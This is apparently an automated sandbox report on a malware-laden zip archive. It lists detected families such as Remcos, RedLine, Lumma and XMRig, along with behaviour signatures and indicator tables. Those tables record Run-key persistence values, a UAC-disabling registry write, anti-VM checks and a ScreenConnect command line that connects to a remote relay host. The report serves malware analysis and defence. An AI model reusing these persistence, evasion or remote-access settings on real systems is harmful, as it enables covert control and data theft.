Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
44Caliber family
Umbral
Stealc family
SystemBC
Umbral family
Amadey family
Quasar payload
Gurcu family
Phorphiex family
Lumma family
Risepro family
xmrig
Amadey
Detect Xworm Payload
Xmrig family
Gurcu, WhiteSnake
Discord RAT
RedLine payload
Detect Umbral payload
Redline family
Exelastealer family
Remcos family
AsyncRat
Lumma Stealer, LummaC
Suspicious use of NtCreateUserProcessOtherParentProcess
TA505
Xworm
RMS
Remcos
Ta505 family
44Caliber
Stealc
Zharkbot family
Asyncrat family
Discordrat family
UAC bypass
Xworm family
Quasar family
Quasar RAT
ZharkBot
Systembc family
RisePro
Exela Stealer
RedLine
XMRig Miner payload
Phorphiex, Phorpiex
Rms family
Modifies visiblity of hidden/system files in Explorer
Phorphiex payload
Detects ZharkBot payload
Grants admin privileges
Detected Nirsoft tools
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Async RAT payload
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Creates new service(s)
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Adds policy Run key to start application
Uses browser remote debugging
Downloads MZ/PE file
Drops file in Drivers directory
Drops startup file
Unsecured Credentials: Credentials In Files
Themida packer
Clipboard Data
Identifies Wine through registry keys
Indicator Removal: Clear Windows Event Logs
VMProtect packed file
Event Triggered Execution: Component Object Model Hijacking
Uses the VBS compiler for execution
Loads dropped DLL
Reads data files stored by FTP clients
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Credentials from Password Stores: Windows Credential Manager
Enumerates connected drives
Network Service Discovery
Legitimate hosting services abused for malware hosting/C2
Obfuscated Files or Information: Command Obfuscation
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
Indicator Removal: File Deletion
Looks up external IP address via web service
Power Settings
Drops file in System32 directory
AutoIT Executable
Suspicious use of SetThreadContext
Hide Artifacts: Hidden Files and Directories
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
Boot or Logon Autostart Execution: Authentication Package
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
System Location Discovery: System Language Discovery
Event Triggered Execution: Installer Packages
Program crash
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
System Network Connections Discovery
Permission Groups Discovery: Local Groups
Browser Information Discovery
System Network Configuration Discovery: Internet Connection Discovery
Detects Pyinstaller
Access Token Manipulation: Create Process with Token
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Embeds OpenSSL
NSIS installer
System policy modification
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Kills process with taskkill
Runs net.exe
Runs .reg file with regedit
Checks processor information in registry
Script User-Agent
Suspicious use of UnmapMainImage
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
GoLang User-Agent
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Collects information from the system
Gathers network information
Uses Task Scheduler COM API
Modifies registry key
Runs ping.exe
Gathers system information
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
Detects videocard installed
Modifies data under HKEY_USERS
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-12 18:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-12 18:19
Reported
2024-12-12 18:40
Platform
win10v2004-20241007-en
Max time kernel
959s
Max time network
1200s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Exela Stealer
Exelastealer family
Lumma Stealer, LummaC
Lumma family
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Remcos
Remcos family
RisePro
Risepro family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2180 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe | C:\Windows\Explorer.EXE |
| PID 2180 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe | C:\Windows\Explorer.EXE |
| PID 2180 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe | C:\Windows\Explorer.EXE |
| PID 3964 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\1657333799.exe | C:\Windows\Explorer.EXE |
| PID 3964 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\1657333799.exe | C:\Windows\Explorer.EXE |
| PID 876 created 3464 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 876 created 3464 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 876 created 3464 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 1680 created 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif | C:\Windows\Explorer.EXE |
SystemBC
Systembc family
TA505
Ta505 family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xworm
Xworm family
ZharkBot
Zharkbot family
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (c13606fe9009f11d)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAfYu9oc1am0yvHfxstgb83QAAAAACAAAAAAAQZgAAAAEAACAAAAAcl7QJx51WIWlm%2f97d68knOHLDmhc8YMk%2bWpKSiakhXgAAAAAOgAAAAAIAACAAAABQXA1RRCIL0SpawatzWi8kVVFrY5j8hGLctHYZFOSln6AEAACLQgNbihyXmbxTioM8KOy3WlcD1ubNH%2bKYLVkdjJpCsLwv1c09knFTKqPX%2bTKT66q%2fkv%2f4mCQq3e1BsOiaqZX6xcUzuAHT34p%2bvGM9Sm%2baiAoR1T84wW4OgKg949Kiq4gADYRGK%2fRa2QNt1%2fjD2UgM6CEoUoFsEnwkZkXXVXtRyNw3nOkXC%2fMclQ1sFX9JaOaD9twuD7lhh2kl4eV7HIj%2fXTVAnXNW1jLdwzJA9kNEVEk2m0pffdIxlgIkXt0Ew86Lq%2f%2bPzf71dMz6te1zFuVJOdFbpOomcgUxOnLGCZaCoyEJ5vn094pYBr7hyfj7zA9eRbiOhYJ%2bHaRXszadpR8ebDP7U3PZFBAr9RROyolueMMnWjL2O6B6%2fb9dqMTjdUYHYtfpBx0fL7AMLuLgAgPVPNA7R3XC3tAuVfHKxahgSmU21p%2bIVp4Wg5lnQFB32KJpLaiBODcfc14tR8ktV6jIt1sb9qlnHVWvq2k62%2frwrp98RKVCoISo9xAbRejo1Z99IcG7aDbXheLWYYWCTtPT0FhHopqowddl8O%2fBlo7E7%2fQJdGTKzmgf8bKhAtt3lL0ReY322bXHJ%2faZVoRe%2f718J9PUB61SO%2fsHS6KpHdmNyZHUA6GWSnKoRYrbZXpEYlexMhzNbp%2f1mLIDfAxgoSg4cOJVh2HXoKSk7c2W6gOoIsFmwv%2bMyX9AT6Zn0M7uYdMi4EemPzsUFSv3woU6Kzovjevy7c0aueREmdCmSIf64gSphEZGLt5gKfVG8nrGDUkW1T6H9VuLAEW%2fGiPWecfPqIFXDdt2TWwsJIw8XujiGu%2blUgitOBO5IwtX2Ygyd6G4q%2fP%2bdvvL4INiPuePVAlKEMsHdBL%2b8P8CQhIO6XZSSpNxydlv78svrwOQCUzXUKPTs2ZHhq%2bYdrVmhoBiX60zLEdxM%2fwoM9cDwn0a4Eelh6abY6EMyxPETEoMXITUZOmon8b8g0J5XwWTyiXeQdlZ%2fG6BnmtQPtLry0qL0tJ13ArQ7UCcYM3gkUgi6fvwQmR7xT9mhagjQANmSSLZAM%2f50laioMrkgXgG%2f994rDbTRey5%2bzAWhACVKAH6sneKqP1TY8SjvkM0Yr6DSpHXbfk7G3doZv3gmqD9Kp%2bl6cBhTdPoa0m5dGu8NWTiZM%2f53Dkl%2brf63PSqNIrYkPAchsi8U7Lm6hItPfjtf8Do0ErwYv8xjb7tYJ9RpoB9omjCG%2bKukWwF88A%2bWe8D2z3x%2bylvcon%2fcMkyoVdPWQPmxJwwu7Mjz2f1qBjV49dZf7qTX%2b9VnGIBmeIFsnSPhyAcDnmqLq1gjhweXDJrkZf8595GNlBm5FM6ph8En8j8oGVMSVKz5BWxmTvLEw3SMZXF1WfblcKcRySi1wEMwsESwPOihGPTGqTK7nlmH6U7NaZYDUNBZvrhceunf%2fqnI36nEM6U4%2fSSTUNswLSACpEiRDS0Y1j8ujBEGhCPvc1lr6%2f6i5ssUzEyuOoE9edLEPbzRP%2fNWc8kFnj%2fmcJ4A8PD%2b0rJ4v6d7vfI6vrL0ROC2sV5SuYPCYS1zdD1pwsxfzlP3ACcksEZhqzocuU%2bG3d4IRjKuUAAAADXZ2g92haPt%2fueSEcAxo%2fN8uUOko0EO9nRiEwmg%2fnDCULWNrQoIiZcn90AD2cGPdcBIuZzzp1QKfge3Z7LQx8h\"" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
Stops running service(s)
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1599224382.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\223522870.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\file1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe | C:\Users\Admin\AppData\Local\Temp\Files\2020.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe | C:\Users\Admin\AppData\Local\Temp\Files\2020.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrsYC4kDbQNPAiJow2kT3TU0.bat | C:\Users\Admin\AppData\Local\Temp\Files\file1.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsecured Credentials: Credentials In Files
Uses the VBS compiler for execution
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\3188116601.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" | C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\2863614952.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Files\leto.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monster Update Service = "C:\\Users\\Admin\\AppData\\Local\\MonsterUpdateService\\Monster.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" | C:\ProgramData\tst\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
